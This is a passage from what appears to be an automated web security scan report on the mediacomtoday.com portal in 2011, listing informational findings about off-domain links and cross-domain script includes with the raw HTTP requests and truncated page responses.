                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/26.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.34. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=15 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313369396056; dslv=1313369396057; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 01:18:04 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135202
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=16" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;fbf29929;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;26003a9d;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/28.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.35. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=22 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=21
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313381615347; dslv=1313381615348; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 04:42:08 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134033
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=23" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;953e5231;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;f5a8cb38;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/26.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.36. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=9 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313358923545; dslv=1313358923546; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 22:24:04 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134998
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=10" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;d73f3adc;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;f5a8cb38;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/30.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.37. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=26 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=25
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313388601441; dslv=1313388601442; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 06:38:17 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133755
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=27" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;d73f3adc;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;a5152b80;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/26.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 14 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=20 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
